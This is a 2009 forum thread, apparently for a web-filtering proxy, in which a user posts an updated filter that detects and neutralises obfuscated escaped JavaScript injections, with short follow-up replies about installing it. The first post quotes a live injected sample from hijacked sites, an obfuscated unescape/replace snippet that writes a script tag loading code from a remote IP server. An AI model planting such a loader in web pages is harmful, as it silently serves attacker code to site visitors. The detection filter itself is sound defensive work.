Post Reply 
Bugfix + 0day: JS Kill - Specific Escaped Code
Apr. 01, 2009, 09:25 PM
Post: #1
Bugfix + 0day: JS Kill - Specific Escaped Code
Two changes:
- Global variable "a" wasn't always reset, resulting in odd (but harmless) secondary effects.
- I came across two sites today containing code (pointing to a Latvian server) like:
Code:
document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));


If the new subroutine matches, you'll get a Log-Rare entry like:
Code:
WEB JS_Escape     replace     http://my-hijacked-site.com/

Let me know of any false positives.


Code:
[Patterns]
Name = "JS Kill: Specific Escaped Code     9.04.01 [sd] (d.2)"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))(^$TST(keyword=*.(a_js|a_jsmeth).*))"
Limit = 7800
Match = "\= \" (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
        "*\"$SET(1==\"\")$SET(5= (string))|$SET(1==\"\"; var prxBlocked=\")$SET(5= (string, large))*"
        ")&&(^*</script)\6)"
        "|\= \' (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
        "*\'$SET(1==\'\')$SET(5= (string))|$SET(1==\'\'; var prxBlocked=\')$SET(5= (string, large))*"
        ")&&(^*</script)\6)"
        "|unescape \($TST(script=[1s]*) ("
        "$INEST(\(,(")\2(^%") (%3C(%73%63|%53%43)\4*|\6),\))\)"
        "((^ [,;)])(.(replace)\4$SET(1=\2\2.replace)|)|$SET(1=\2\2))"
        "|\\(")\2 (%3C(%73%63|%53%43)\4*|\6)\\$TST(\2) \)((^ [,;)])|$SET(1=\\\2\\\2))$SET(5= (2nd level))"
        "|(\\+")\2(^%")$SET(1=PrxVoidF\(\2Blocked: $GET(a)\2, \2\4\6)$SET(5= (large))"
        " (^*</script)(%3C(%73%63|%53%43)\4\6|\6)"
        ")"
        "&"
        "$TST(\4=replace$SET(a=\4)|$SET(a=script)*)"
        "|$TST($UESC(\6)=*("
        ".(createControlRange|FileSystemObject|fromCharCode)\4$SET(a=\4)"
        "|<(iframe$SET(a=iframe)|applet$SET(a=applet)|object[^>]++data=$SET(a=object data))"
        "|c("
        "reateObject$SET(a=CreateObject)"
        "|l(sid( \(" {| : {+|=" {+)|assid=" {+)(^D27CDB6E-AE6D-11cf-96B8-444553540000|[^0-9a-f])"
        "$LST(ClassIDs)$SET(a=ClsID: \9)"
        ")"
        "|ms-its:$SET(a=ms-its)"
        "|src=$TST(flag=*.adurl:1.*)(\\(")\3 ((^\\$TST(\3))*\\$TST(\3)&&$LST(AdList)$SET(a=src: \9)*)|"
        "$AV( ?*& $LST(AdList)$SET(a=src: \9)))"
        "|unescape(^(^ \())$SET(a=unescape)"
        "|VBScript$SET(a=VBScript)"
        ")*)"
        "&"
        "($TYPE(htm)$SET(eHits=$GET(eHits)"
        "%3Cspan class=%22ProxFly-Span%22>$GET(mHead) JS Escape:%3C/span>"
        "      $ESC($GET(a))\5%3Cbr class=%22ProxFly-Br%22 />"
        ")|)"
        "($TST(volat=*.log:2*)$ADDLST(Log-Main,[$DTM(d T)]\tWEB JS_Escape\5 \t$GET(a) \t\u)|)"
        "($TST(volat=*.log:[12]c.*)$ADDLST(Log-Rare,WEB JS_Escape\5 \t$GET(a) \t\u)|)"
Replace = "\1$SET(a=)"
Add Thank You Quote this message in a reply
Apr. 02, 2009, 01:15 AM
Post: #2
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
where do i put the filter?

under JS intercept?
Add Thank You Quote this message in a reply
Apr. 02, 2009, 01:34 AM (This post was last modified: Apr. 02, 2009 01:39 AM by sidki3003.)
Post: #3
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
Dang, as mentioned above, it's an update. Wink
So, look for the previous version, untick it, place the new version above it, save the config.
Add Thank You Quote this message in a reply
Apr. 02, 2009, 02:31 AM
Post: #4
RE: Bugfix + 0day: JS Kill - Specific Escaped Code
oh bugger. My apology!
Add Thank You Quote this message in a reply
Post Reply 


Forum Jump: